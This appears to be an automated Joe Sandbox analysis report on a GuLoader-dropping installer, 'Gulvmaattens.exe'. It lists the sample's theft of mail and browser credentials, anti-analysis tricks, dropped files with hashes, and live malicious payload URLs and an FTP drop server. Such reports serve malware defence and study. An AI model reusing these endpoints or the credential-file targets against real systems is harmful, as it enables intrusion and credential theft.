          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_004034C5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3308, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: Yara matchFile source: 0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3308, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3308, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts211
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Disable or Modify Tools
          1
          OS Credential Dumping
          2
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium1
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Native API
          Boot or Logon Initialization Scripts1
          Access Token Manipulation
          1
          Deobfuscate/Decode Files or Information
          LSASS Memory117
          System Information Discovery
          Remote Desktop Protocol1
          Data from Local System
          Exfiltration Over Bluetooth1
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Command and Scripting Interpreter
          Logon Script (Windows)111
          Process Injection
          1
          Obfuscated Files or Information
          Security Account Manager331
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          Automated Exfiltration1
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Timestomp
          NTDS1
          Process Discovery
          Distributed Component Object Model1
          Clipboard Data
          Scheduled Transfer11
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading
          LSA Secrets241
          Virtualization/Sandbox Evasion
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Masquerading
          Cached Domain Credentials1
          Application Window Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items241
          Virtualization/Sandbox Evasion
          DCSync1
          Time Based Evasion
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Access Token Manipulation
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)111
          Process Injection
          /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
          Time Based Evasion
          Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 680567 Sample: Gulvmaattens.exe Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 43 Malicious sample detected (through community Yara rule) 2->43 45 Antivirus detection for URL or domain 2->45 47 Yara detected GuLoader 2->47 49 2 other signatures 2->49 7 Gulvmaattens.exe 29 2->7         started        process3 file4 33 C:\Users\user\Falder99\...\vfslog.dll, PE32+ 7->33 dropped 35 C:\Users\user\Falder99\...\sqmapi.dll, PE32+ 7->35 dropped 37 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 7->37 dropped 39 C:\Users\user\AppData\Local\...\System.dll, PE32 7->39 dropped 51 Obfuscated command line found 7->51 53 Writes to foreign memory regions 7->53 55 Mass process execution to delay analysis 7->55 57 Tries to detect Any.run 7->57 11 CasPol.exe 11 7->11         started        15 CasPol.exe 7->15         started        17 cmd.exe 7->17         started        19 66 other processes 7->19 signatures5 process6 dnsIp7 41 212.192.246.226, 49795, 80 RHC-HOSTINGGB Russian Federation 11->41 59 Tries to steal Mail credentials (via file / registry access) 11->59 61 Tries to harvest and steal browser information (history, passwords, etc) 11->61 63 Tries to detect Any.run 11->63 21 conhost.exe 11->21         started        65 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->65 67 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 15->67 23 Conhost.exe 17->23         started        25 Conhost.exe 19->25         started        27 Conhost.exe 19->27         started        29 Conhost.exe 19->29         started        31 60 other processes 19->31 signatures8 process9

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Gulvmaattens.exe1%VirustotalBrowse
          Gulvmaattens.exe2%ReversingLabs
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nskEE19.tmp\System.dll4%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nskEE19.tmp\System.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nskEE19.tmp\nsExec.dll8%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nskEE19.tmp\nsExec.dll0%ReversingLabs
          C:\Users\user\Falder99\Interelectrode\Overvejendes\sqmapi.dll0%MetadefenderBrowse
          C:\Users\user\Falder99\Interelectrode\Overvejendes\sqmapi.dll0%ReversingLabs
          C:\Users\user\Falder99\Interelectrode\Overvejendes\vfslog.dll0%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
          http://DynDns.comDynDNS0%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%VirustotalBrowse
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
          http://212.192.246.226/jLIEsqMZom33.asdL100%Avira URL Cloudmalware
          http://subca.ocsp-certum.com050%Avira URL Cloudsafe
          ftp://ftp.gettoner.com.mx/droid100%Avira URL Cloudmalware
          http://212.192.246.226/jLIEsqMZom33.asdm100%Avira URL Cloudmalware
          http://subca.ocsp-certum.com020%Avira URL Cloudsafe
          http://subca.ocsp-certum.com010%Avira URL Cloudsafe
          http://NwSpLV.com0%Avira URL Cloudsafe
          http://212.192.246.226/jLIEsqMZom33.asd100%Avira URL Cloudmalware
          No contacted domains info
          NameMaliciousAntivirus DetectionReputation
          http://212.192.246.226/jLIEsqMZom33.asdtrue
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://127.0.0.1:HTTP/1.1CasPol.exe, 0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          low
          http://DynDns.comDynDNSCasPol.exe, 0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://crl.certum.pl/ctsca2021.crl0oGulvmaattens.exefalse
            high
            http://repository.certum.pl/ctnca.cer09Gulvmaattens.exefalse
              high
              http://repository.certum.pl/ctsca2021.cer0Gulvmaattens.exefalse
                high
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://212.192.246.226/jLIEsqMZom33.asdLCasPol.exe, 0000008F.00000002.55914326721.0000000000F48000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://crl.certum.pl/ctnca.crl0kGulvmaattens.exefalse
                  high
                  http://subca.ocsp-certum.com05Gulvmaattens.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  ftp://ftp.gettoner.com.mx/droidCasPol.exe, 0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://212.192.246.226/jLIEsqMZom33.asdmCasPol.exe, 0000008F.00000002.55914326721.0000000000F48000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://subca.ocsp-certum.com02Gulvmaattens.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  http://subca.ocsp-certum.com01Gulvmaattens.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.certum.pl/ctnca2.crl0lGulvmaattens.exefalse
                    high
                    http://repository.certum.pl/ctnca2.cer09Gulvmaattens.exefalse
                      high
                      http://NwSpLV.comCasPol.exe, 0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://nsis.sf.net/NSIS_ErrorErrorGulvmaattens.exefalse
                        high
                        http://www.certum.pl/CPS0Gulvmaattens.exefalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          212.192.246.226
                          unknownRussian Federation
                          205220RHC-HOSTINGGBfalse
                          Joe Sandbox Version:35.0.0 Citrine
                          Analysis ID:680567
                          Start date and time: 08/08/202220:23:502022-08-08 20:23:50 +02:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 14m 23s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:Gulvmaattens.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                          Run name:Suspected Instruction Hammering
                          Number of analysed new started processes analysed:156
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@403/8@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:
                          • Successful, ratio: 32.1% (good quality ratio 31.6%)
                          • Quality average: 87%
                          • Quality standard deviation: 21.2%
                          HCA Information:
                          • Successful, ratio: 98%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Adjust boot time
                          • Enable AMSI
                          • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                          • TCP Packets have been reduced to 100
                          • Excluded IPs from analysis (whitelisted): 20.93.58.141, 20.54.122.82, 20.40.136.238, 20.31.108.18, 20.82.210.154
                          • Excluded domains from analysis (whitelisted): wd-prod-cp-eu-north-3-fe.northeurope.cloudapp.azure.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, client.wns.windows.com, wdcpalt.microsoft.com, iris-de-prod-azsc-frc-b.francecentral.cloudapp.azure.com, iris-de-prod-azsc-weu-b.westeurope.cloudapp.azure.com, arc.trafficmanager.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, arc.msn.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • Report size getting too big, too many NtWriteVirtualMemory calls found.
                          TimeTypeDescription
                          20:27:04API Interceptor2480x Sleep call for process: CasPol.exe modified
                          No context
                          No context
                          No context
                          No context
                          No context
                          Process:C:\Users\user\Desktop\Gulvmaattens.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):12288
                          Entropy (8bit):5.737874809466366
                          Encrypted:false
                          SSDEEP:192:nenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBDIwL:n8+Qlt70Fj/lQRY/9VjjfL
                          MD5:564BB0373067E1785CBA7E4C24AAB4BF
                          SHA1:7C9416A01D821B10B2EEF97B80899D24014D6FC1
                          SHA-256:7A9DDEE34562CD3703F1502B5C70E99CD5BBA15DE2B6845A3555033D7F6CB2A5
                          SHA-512:22C61A323CB9293D7EC5C7E7E60674D0E2F7B29D55BE25EB3C128EA2CD7440A1400CEE17C43896B996278007C0D247F331A9B8964E3A40A0EB1404A9596C4472
                          Malicious:false
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 4%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....$_...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text...O .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\Gulvmaattens.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):7168
                          Entropy (8bit):5.260607917694217
                          Encrypted:false
                          SSDEEP:96:JXmkmwmHDqaRrlfAF4IUIqhmKv6vBckXK9wSBl8gvElHturnNQaSGYuHr2DCP:JAjRrlfA6Nv6eWIElNurnNQZGdHc
                          MD5:4C77A65BB121BB7F2910C1FA3CB38337
                          SHA1:94531E3C6255125C1A85653174737D275BC35838
                          SHA-256:5E66489393F159AA0FD30B630BB345D03418E9324E7D834B2E4195865A637CFE
                          SHA-512:DF50EADF312469C56996C67007D31B85D00E91A4F40355E786536FC0336AC9C2FD8AD9DF6E65AB390CC6F031ACA28C92212EA23CC40EB600B82A63BE3B5B8C04
                          Malicious:false
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 8%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L.....$_...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\Gulvmaattens.exe
                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
                          Category:dropped
                          Size (bytes):8416
                          Entropy (8bit):7.879419169003622
                          Encrypted:false
                          SSDEEP:192:oXRVoU7UIt/4MzCyCZU/w2Z73YQeQHJtX5Nc5:KRVo+UItxzCyfw2ZLYQeQD5u
                          MD5:1855A4436F949279BED5E020101C982E
                          SHA1:B38DBEBAED2B47F580892A89C2DF02F6EB0409E9
                          SHA-256:9D0EAFD75713B49208B34BF402D60AA951080B4AF07B7B4A92894066A3EABE56
                          SHA-512:6D05D331B52A72D38C8CFF0F1B1FEDCCF07859E31685AE7A1C7E2FDDC0CCC3CCB0B03638272A8D1EA65639A3A8F9D5FBFE6B076410298791624DB7E6B7ABBD91
                          Malicious:false
                          Preview:......JFIF.....d.d.....:Exif..MM.*......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..;..........ox......?..<...........k.....F..P.m".Ine....$...nr.q`G.i..L..%..k..O/.mo.cU...G..$.X...z........L/.hz...C.p...hZ?.>.v..f...-.$.....+.D..S....[L..3...D.V.1z..`..08.Ti..v.7c.U*.......wi.......e\.....v..eR.........=rO.8..V%...T..3,'.7....Km.5...C.r......^.c.w..o..5.nW.)#;.....v..N.......I.s..
                          Process:C:\Users\user\Desktop\Gulvmaattens.exe
                          File Type:ASCII text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):49200
                          Entropy (8bit):3.9997347855366217
                          Encrypted:false
                          SSDEEP:768:yffjLvraxVbU1ByxAfpR/DMKqPS9yhiDOWQnaIL51KwWaYqZbO4MSCA2DxigXf61:+/rk4BBpgSwk6rnas5hbuSp2FLVgd
                          MD5:301316E745326D38D4BD5864F6E56287
                          SHA1:75D11208B7F142BBAF5CF6550B84CF3C8F5C0FD3
                          SHA-256:628F761918DE28ADC86631CE0B4536FAF62D9EAC04E080E9F20A3CE0F983F2BA
                          SHA-512:A573ABCC7D3DFE8656C537F9E6C40AC6F20B388C623258B5D84D6896F6A3557DFE8E89953F7F5D8BFE786F1F88EB2077D8DF41E79021094CA7F66B7DBD81135D
                          Malicious:false
                          Preview:8BADA3CD0CA9A9C5F29972F662F7EE72162D5B9C6B074DD2A4AA1C205FB4676D141C92F8F08065E612FDFC68E8921C12F356396296903CB92A9E9D9BE6E1006C6B2BF359513ABFE6D1BAA6F1F7C8479EA85D6802C3BBC589AED2669E4BF6F829725A13050E9D100DA41B530336B0D5D145E390952907843DE8C86D5112592FA679141E7891B3F6BE3941B0CE9D2A0075A9069124145AA17CF013656540B1FEEC0AEBABE47B070E59ECD408F4AA87160B6F5461A95B2213606259DCF1B3592724E8D1395E82D5B1F8AD6CD14F4898A3CEF097816C7ACEAD5A7C85C371257FD2319E4C8698B486959064928DE22A99443658E1DB424450FB6E6A10AA43D0357678902A7FFD6A7F3EB6F91E7A34AB1EDAB7B4726C28EF0A44E2DADE4761AAA53AD216CF84B3149FAAF0C5CDD72F1B246B29A0A7A21AB0F751843071C8BF8D8B106FA94A55F52F06987F275D3DF7CB6C1904FF3D45D3D83B858241F3DCCB1D48DC37333066E5627B763BE7BDB14771FFD0D9ACC4956ADB62EEFB7F464359BE5D40AE0176EB22F112AA3E2644139F0141F05A7ECE0C9F0B0B0FE2801C08FB57B993067067C3550D229802BC5768BC1BEC762C6521B08130E8B4109B6861A7C31B64F8F176344C1DCF52358AF03845C4B9812BEE3C3ACE4D3F803D25B043D4BDC4275D6116B505A86EEC034BA2955A66E8F542B0A3680C
                          Process:C:\Users\user\Desktop\Gulvmaattens.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):114776
                          Entropy (8bit):7.144941353557845
                          Encrypted:false
                          SSDEEP:1536:A8hQvOtVACpAfv1JXt1EMAtUPXuIBY+zG15ywvnuxu8:FWvOXACpIvDXtitUP+ELG15nPWu8
                          MD5:ED68580DB9DDC66DEE28385FA90DEE20
                          SHA1:E7BB7F49FA8C665A272EF98E1FCF55A1D1488226
                          SHA-256:7D02C2522E8F918F6AC21B6C836C587030FF9E823B4A3B4EA9A46005D9489544
                          SHA-512:8F19B196EC5D282C28199AD0391B13C4977190B3AF5A6BB732DA8EFC24DE6AC5A0632D74209A8F5382F98F9FEBCFB619CEA006ECB682476B0FB10447A9BE8D9A
                          Malicious:false
                          Preview:.t....AYM.G[].X....["....W.8..^~(#%0.....`.#.....P~..1.{....OG..}....ZN..>1..8..NU......S...#.s....L.J..^.v..8..{.v^*...[..J..9...)T...m..j.V.;..&..7.Z.aB...[6~u.~b.....r..Y[.M....M...x..1.AV...O.6.......s.C!=..V.o.....BQX.....*....A.#...P.>..,..]B;.$.E....!.]...=&.|...i...h.Wr.j...x...2.YE.W...........7e.`..o.7.@o..........@_..3Wr<..P.%z....;P.z3..|1.v0..t.:..tE).^...)q.q..~@<^Tw..3...|L...._......Q.&fI.z...:cQ.<G...|..0....c..]...l>..4.Bv.R....`..M....|.8......B.YdM.........N.t.....l.,..4..UY.V?x.7.7....C.$/.h...........a....|tv..4.P...fb......Q....../i..y7..?s..N.....mG.h.<.=....C....pt._.G.r0...^=....^@.X^..N96z.,..(p...i....V...g.Z<+..q....@TT.X^.A..*..'..)....B+..j.YM.%`"..0....N8a...+G"....:a*q..s.(MhzX1o..cj.F..f"6...O81.V6!V...mQq...c...........$.aG.K.......H}.,..9.3.H.eP"..j...RZ..W...XQ{...%.....:.......8....\....V^..Q..7.....O:#."..r.....m....b.......3&....B..%.G.BUG...o/............n.;.........pk.e.IlQ.d..t.]g."5$Tu...Z..)..o.m
                          Process:C:\Users\user\Desktop\Gulvmaattens.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):13116
                          Entropy (8bit):4.2192956006819475
                          Encrypted:false
                          SSDEEP:192:DAvLtKog3W8jiD1/oLpsExUKqlyjn6SybkSoxIFg/7mSX30hB8OnqdE5HpF2gS2:MvLAog/I1wdsExXxigaSUvRj5r
                          MD5:F23506956964FA69C98FA3FB5C8823B5
                          SHA1:B2D5241AE027A0E40F06A33D909809A190F210FE
                          SHA-256:2F5EED53A4727B4BF8880D8F3F199EFC90E58503646D9FF8EFF3A2ED3B24DBDA
                          SHA-512:416C71BA30018EA292BB36CDC23C9329673485A8D8933266A9D9A7CC72153B8BAED3D430F52EAB4F5D3ADDF6583611B3777A50454599F1E42716F5F879621123
                          Malicious:false
                          Preview:abandon.ability.able.about.above.absent.absorb.abstract.absurd.abuse.access.accident.account.accuse.achieve.acid.acoustic.acquire.across.act.action.actor.actress.actual.adapt.add.addict.address.adjust.admit.adult.advance.advice.aerobic.affair.afford.afraid.again.age.agent.agree.ahead.aim.air.airport.aisle.alarm.album.alcohol.alert.alien.all.alley.allow.almost.alone.alpha.already.also.alter.always.amateur.amazing.among.amount.amused.analyst.anchor.ancient.anger.angle.angry.animal.ankle.announce.annual.another.answer.antenna.antique.anxiety.any.apart.apology.appear.apple.approve.april.arch.arctic.area.arena.argue.arm.armed.armor.army.around.arrange.arrest.arrive.arrow.art.artefact.artist.artwork.ask.aspect.assault.asset.assist.assume.asthma.athlete.atom.attack.attend.attitude.attract.auction.audit.august.aunt.author.auto.autumn.average.avocado.avoid.awake.aware.away.awesome.awful.awkward.axis.baby.bachelor.bacon.badge.bag.balance.balcony.ball.bamboo.banana.banner.bar.barely.bargain.barre
                          Process:C:\Users\user\Desktop\Gulvmaattens.exe
                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):48536
                          Entropy (8bit):6.140681321190623
                          Encrypted:false
                          SSDEEP:768:cUmuzoNLd6VL1ilAb+x4SekjRYJKRiISZ20pidakx9o9dAPkuFJI1PHdOC:Hf20wzjRuC0uaF9d8dFePHQ
                          MD5:A5D6ECC292535D2C635EE25701238173
                          SHA1:DE34B8248886E59AC72C5A1FDA9876F40312EC95
                          SHA-256:E320356D53C168DB9080BB04D5E8F4CC16D66657DEEB063F9133EAC9381BDB1D
                          SHA-512:E1CA3E6627C2C5D59F2EC931887F82514B850E567EF423D0F1CC763948A190ECBF0FEEC4F10FD697C35C252E56ACFC02BB7B163745946E791B11BAA467B00D2F
                          Malicious:false
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 0%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............n...n...n....m..n.......n.......n...n..vn.......n.......n.......n.......n....o..n.......n..Rich.n..........PE..d....b............" .....Z...D............................................................`A............................................4...4...d........................#......4....w..T............................p..............0q..X............................text....Y.......Z.................. ..`.rdata...)...p...*...^..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\Gulvmaattens.exe
                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):280887
                          Entropy (8bit):5.09238794683129
                          Encrypted:false
                          SSDEEP:3072:G2dSo+lzH9Hh1RopViMaU5/Y5EvaMIVSB+efAQyJen3nl3fNLBakia88i5QBd9:yo+zpxksl43fNteanBd9
                          MD5:E62D75BDEDBE3B00F61102D2D260EBCF
                          SHA1:6BC18ED2EAF0C86E0AED7106EF95E1A441863589
                          SHA-256:574A50AD090587D15CC43A5B1D6409EE503C5A5750B6E9E5AC976C3D5FBFBE44
                          SHA-512:9D32FDC4C6CB7889B2F67ACA8B8AC6330536820038FF47C147634AD314D6592B5AEF9BD3AC09EB1D11351E9A1545B968A9AA039FBEABAF7B96127F759B7D1DE7
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...sL.`....T.....& ...$............P.........e.....................................`.....`... .........................................U.......t............................0..............................@...(....................................................text...X...........................`.P`.data... ...........................@.`..rdata..............................@.`@.pdata..............................@.0@.xdata..8...........................@.0@.bss..................................`..edata..U...........................@.0@.idata..t...........................@.0..CRT....X...........................@.@..tls......... ......................@.@..reloc.......0......................@.0B/4...........@......................@.PB/19..........P......................@..B/31......)...P...*..................@..B/45......t.......v..................@..B/57.....
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                          Entropy (8bit):7.796693867979766
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:Gulvmaattens.exe
                          File size:342848
                          MD5:afa8d5c2f8f14ed458ea6d8547fe57a8
                          SHA1:ef603c82c7976fcd34a018cd8280e28b8a22510d
                          SHA256:7d3d134f8b37621766da3378b143ab0fbacf13f7793f42b6e81d7e5cc702a32b
                          SHA512:5fd1f673a0ba53867ced3fca308d90b0bb8cce71805f1ac7ad5b8be8527e3820a13b754d8dff1e6d5afcdb2dd5770f6d2f4d01d5b780bbbde673391f05eac586
                          SSDEEP:6144:ST4DtXkMfWPwU2e+hNPLutht2tJEFcRs/aP55+02MGH/WtSy4uh:STakO7te4NPwfOEEm65mgSHW
                          TLSH:C67401B1DBF6D00BDAB2DA347C75530A7DEA5A62503257135305F8C8B8A22A36FCD790
